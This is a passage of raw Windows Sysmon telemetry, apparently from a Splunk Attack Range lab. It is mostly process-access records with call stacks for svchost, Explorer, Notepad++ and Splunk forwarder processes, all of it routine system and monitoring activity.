10341000x800000000000000081902Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:33.151{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081901Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:33.151{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081900Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:33.151{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081899Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:33.151{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081898Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:33.151{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081897Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:33.151{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B2FD-615A-5901-00000000FD01}3112C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081896Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:33.151{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B2FD-615A-5901-00000000FD01}3112C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081895Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:33.151{2FDD8D40-B2FD-615A-5901-00000000FD01}3112C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000104019Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:34.394{58E9C193-AE68-615A-C800-00000000FC01}45484880C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104018Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:34.394{58E9C193-AE68-615A-C800-00000000FC01}45484880C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104017Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:34.394{58E9C193-AE68-615A-C800-00000000FC01}45484880C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104016Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:34.394{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62890|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104015Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:34.394{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+6284c|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104014Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:34.394{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104013Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:34.394{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104012Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:34.316{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FBF9E9BB11C585FF59A956FCACBBEB2,SHA256=83E4B66265E486C18EDEA7D8F68AABBBCDC9D80DBEFB2AC8863CC1411748EF76,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081925Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:34.948{2FDD8D40-B2FE-615A-5A01-00000000FD01}12683408C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081924Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:34.776{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B2FE-615A-5A01-00000000FD01}1268C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081923Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:34.776{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081922Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:34.776{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081921Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:34.776{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081920Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:34.776{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081919Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:34.776{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081918Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:34.776{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081917Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:34.776{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081916Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:34.776{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081915Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:34.776{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081914Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:34.776{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B2FE-615A-5A01-00000000FD01}1268C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081913Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:34.776{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B2FE-615A-5A01-00000000FD01}1268C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program 